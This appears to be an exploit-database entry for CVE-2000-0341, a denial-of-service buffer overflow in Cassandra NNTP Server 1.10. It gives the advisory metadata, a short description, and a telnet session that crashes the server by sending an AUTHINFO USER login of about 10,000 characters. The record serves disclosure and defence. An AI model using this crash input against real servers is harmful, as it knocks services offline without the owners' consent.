Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow

Author: Ussr Labs
type: dos
platform: windows
port: 
date_added: 2000-05-01  
date_updated: 2012-07-16  
verified: 1  
codes: OSVDB-1304;CVE-2000-0341  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19884.txt  
source: https://www.securityfocus.com/bid/1156/info

Unchecked buffer exists in the code that handles login information in Cassandra NNTP v1.10 server. Entering a login name that consists of over 10 000 characters will cause the server to stop responding until the administrator restarts the application.

[host$ telnet target 119
Trying target...
Connected to target.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1
May 2000 xx:xx:xx +-300 (posting allowed)

AUTHINFO USER <10 000 character string>


Where buffer is 10000 characters.